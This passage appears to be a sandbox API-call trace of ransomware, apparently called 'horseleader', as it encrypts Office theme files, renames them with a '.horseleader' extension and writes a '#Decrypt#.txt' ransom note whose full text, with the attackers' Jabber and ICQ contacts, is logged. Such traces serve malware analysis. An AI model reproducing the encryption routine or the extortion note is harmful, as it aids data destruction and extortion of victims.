ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7e93, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.919] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.919] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 80 [0246.919] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.920] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.920] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.920] lstrlenW (lpString=".testttjffg") returned 11 [0246.920] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.920] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.920] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.920] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.920] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 80 [0246.920] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.920] 
GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=32403) returned 1 [0246.921] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.927] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.927] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.927] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2e93, lpOverlapped=0x0) returned 1 [0246.927] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd16d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.927] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2e93, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2e93, lpOverlapped=0x0) returned 1 [0246.928] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.928] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.928] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 
[0246.928] CloseHandle (hObject=0x1a4) returned 1 [0246.928] GetProcessHeap () returned 0x780000 [0246.928] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.928] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.horseleader") returned 92 [0246.928] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.horseleader")) returned 1 [0246.929] GetProcessHeap () returned 0x780000 [0246.929] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.929] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7e93, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.929] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.929] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\#Decrypt#.txt") returned 81 [0246.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\#Decrypt#.txt" (normalized: "c:\\program files\\common 
files\\microsoft shared\\themes14\\eclipse\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.930] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0246.930] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.931] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.931] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.931] CloseHandle (hObject=0x158) returned 1 [0246.931] 
GetProcessHeap () returned 0x780000 [0246.931] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.931] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51f70990, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="EDGE", cAlternateFileName="")) returned 1 [0246.932] lstrcmpiW (lpString1="EDGE", lpString2="Windows") returned -1 [0246.932] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE") returned 64 [0246.932] lstrcmpW (lpString1="EDGE", lpString2=".") returned 1 [0246.932] lstrcmpW (lpString1="EDGE", lpString2="..") returned 1 [0246.932] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.932] GetProcessHeap () returned 0x780000 [0246.932] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.932] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\*") returned 66 [0246.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51f70990, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.956] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.956] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\.") returned 66 [0246.956] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.956] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51f70990, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.956] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.956] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\..") returned 67 [0246.956] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.956] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.956] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb06ab00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51f70990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfb06ab00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xb8f8, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="EDGE.ELM", cAlternateFileName="")) returned 1 [0246.957] lstrcmpiW (lpString1="EDGE.ELM", lpString2="Windows") returned -1 [0246.957] wnsprintfW (in: 
pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM") returned 73 [0246.957] StrStrIW (lpFirst="EDGE.ELM", lpSrch=".horseleader") returned 0x0 [0246.957] lstrcmpW (lpString1="EDGE.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.957] lstrcmpW (lpString1="EDGE.ELM", lpString2="_uninstalling_.png") returned 1 [0246.957] lstrlenW (lpString=".testttjffg") returned 11 [0246.957] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM", lpSrch=".testttjffg") returned 0x0 [0246.957] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.957] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.957] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.958] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM") returned 73 [0246.958] StrStrW (lpFirst="EDGE.ELM", lpSrch=".txt") returned 0x0 [0246.958] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=47352) returned 1 [0246.958] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.962] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0246.962] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.962] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.963] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.963] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.963] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x18f8, lpOverlapped=0x0) returned 1 [0246.963] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.963] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x18f8, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x18f8, lpOverlapped=0x0) returned 1 [0246.963] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.964] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.964] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, 
lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.964] CloseHandle (hObject=0x1a4) returned 1 [0246.964] GetProcessHeap () returned 0x780000 [0246.964] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.964] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM.horseleader") returned 85 [0246.964] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.elm.horseleader")) returned 1 [0246.966] GetProcessHeap () returned 0x780000 [0246.966] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.966] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x51f70990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x211, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="EDGE.INF", cAlternateFileName="")) returned 1 [0246.966] lstrcmpiW (lpString1="EDGE.INF", lpString2="Windows") returned -1 [0246.966] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF") returned 73 [0246.966] StrStrIW (lpFirst="EDGE.INF", lpSrch=".horseleader") returned 0x0 
[0246.966] lstrcmpW (lpString1="EDGE.INF", lpString2="#Decrypt#.txt") returned 1 [0246.966] lstrcmpW (lpString1="EDGE.INF", lpString2="_uninstalling_.png") returned 1 [0246.966] lstrlenW (lpString=".testttjffg") returned 11 [0246.966] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF", lpSrch=".testttjffg") returned 0x0 [0246.966] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.966] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.966] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.967] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF") returned 73 [0246.967] StrStrW (lpFirst="EDGE.INF", lpSrch=".txt") returned 0x0 [0246.967] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=529) returned 1 [0246.967] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x211, lpOverlapped=0x0) returned 1 [0246.969] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.969] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x211, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x211, lpOverlapped=0x0) 
returned 1 [0246.969] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.969] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.969] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.970] CloseHandle (hObject=0x1a4) returned 1 [0246.970] GetProcessHeap () returned 0x780000 [0246.970] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.970] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF.horseleader") returned 85 [0246.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\EDGE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\edge.inf.horseleader")) returned 1 [0246.973] GetProcessHeap () returned 0x780000 [0246.973] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.973] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, 
